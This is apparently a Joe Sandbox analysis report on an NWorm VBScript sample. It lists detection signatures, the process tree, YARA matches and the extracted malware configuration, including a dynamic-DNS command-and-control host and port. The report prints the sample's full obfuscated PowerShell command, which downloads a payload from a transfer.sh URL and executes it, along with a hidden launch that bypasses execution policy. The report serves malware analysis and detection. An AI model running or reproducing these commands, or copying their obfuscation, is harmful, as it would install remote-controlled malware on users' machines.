Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YBAXAKQXVYWIXQJDE.VBS

Overview

General Information

Sample Name:YBAXAKQXVYWIXQJDE.VBS
Analysis ID:585402
MD5:40f92eb4b46a3430167477d11dec4c9e
SHA1:515ad5cac3f5b9ed1e7a7e14d53a191a12193984
SHA256:8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f
Tags:N-W0rmvbs
Infos:

Detection

NWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected NWorm
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Creates processes via WMI
Suspicious powershell command line found
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Obfuscated command line found
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Sigma detected: Powerup Write Hijack DLL
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Change PowerShell Policies to an Unsecure Level
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 7032 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • powershell.exe (PID: 7112 cmdline: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_n)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_Ne)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_.W)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
      • aspnet_compiler.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup
{"Host": "nyanwmoney.duckdns.org", "Port": "8891", "Mutex": "594274bc", "Version": "v0.3.8", "Network Seprator": "|NW|"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.batPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x26:$sb3: -WIndoWSTYLe HiDdeN
  • 0x1a:$sc1: -Nop
  • 0x1f:$sd1: -NonI
  • 0x3a:$se3: -ExecutionPolicy Bypass
SourceRuleDescriptionAuthorStrings
0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NWormYara detected NWormJoe Security
    0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0x2dec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    • 0x2e50:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    • 0x2e48:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
    00000002.00000002.945992351.000001EE646CA000.00000004.00000800.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x2375:$sb3: -WIndoWSTYLe HiDdeN
    • 0x2369:$sc1: -Nop
    • 0x236e:$sd1: -NonI
    • 0x2389:$se3: -ExecutionPolicy Bypass
    00000002.00000002.953420708.000001EE7C619000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0xd012:$sb3: -WIndoWSTYLe HiDdeN
    • 0xd006:$sc1: -Nop
    • 0xd00b:$sd1: -NonI
    • 0xd026:$se3: -ExecutionPolicy Bypass
    00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0xe:$sb3: -WIndoWSTYLe HiDdeN
    • 0x18fe:$sb3: -WIndoWSTYLe HiDdeN
    • 0x2:$sc1: -Nop
    • 0x18f2:$sc1: -Nop
    • 0x7:$sd1: -NonI
    • 0x18f7:$sd1: -NonI
    • 0x22:$se3: -ExecutionPolicy Bypass
    • 0x1912:$se3: -ExecutionPolicy Bypass
    Click to see the 16 entries
    SourceRuleDescriptionAuthorStrings
    11.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_NWormYara detected NWormJoe Security
      11.0.aspnet_compiler.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0x2fec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      • 0x3050:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      • 0x3048:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
      11.0.aspnet_compiler.exe.400000.0.unpackMALWARE_Win_NWormDetects NWorm/N-W0rm payloadditekSHen
      • 0x1f6d:$id1: N-W0rm
      • 0x2558:$id1: N-W0rm
      • 0x3247:$x1: pongPing
      • 0x3259:$x2: |NW|
      • 0x2e70:$s1: runFile
      • 0x2e80:$s2: runUrl
      • 0x2ed0:$s3: killer
      • 0x2ef0:$s4: powershell
      • 0x30ac:$s5: wscript.exe
      • 0x2f08:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File "
      • 0x30c5:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
      • 0x31e7:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
      11.0.aspnet_compiler.exe.400000.4.unpackJoeSecurity_NWormYara detected NWormJoe Security
        11.0.aspnet_compiler.exe.400000.4.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
        • 0x2fec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        • 0x3050:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        • 0x3048:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
        Click to see the 22 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_7112.amsi.csvPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0xdcab:$sb3: -WIndoWSTYLe HiDdeN
        • 0x2e75b:$sb3: -WIndoWSTYLe HiDdeN
        • 0xdc9f:$sc1: -Nop
        • 0x2e74f:$sc1: -Nop
        • 0xdca4:$sd1: -NonI
        • 0x2e754:$sd1: -NonI
        • 0xdcbf:$se3: -ExecutionPolicy Bypass
        • 0x2e76f:$se3: -ExecutionPolicy Bypass

        System Summary

        bar